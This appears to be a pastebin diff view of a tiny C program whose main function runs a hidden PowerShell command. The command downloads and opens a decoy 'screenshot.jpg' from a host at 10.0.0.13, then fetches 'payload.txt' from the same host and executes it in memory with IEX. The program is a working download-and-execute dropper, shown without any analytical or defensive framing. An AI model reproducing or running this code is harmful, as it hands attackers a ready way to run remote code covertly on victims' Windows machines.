View difference between Paste ID: Z2rsUPdA and BpYMb2rN
SHOW: | | - or go back to the newest paste.
1
#include<stdio.h>
2
main()
3
{
4
	system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://10.0.0.13/screenshot.jpg', 'C:\\Users\\Public\\screenshot.jpg') & start C:\\Users\\Public\\screenshot.jpg & powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))\"");
5
	return 0;
6
}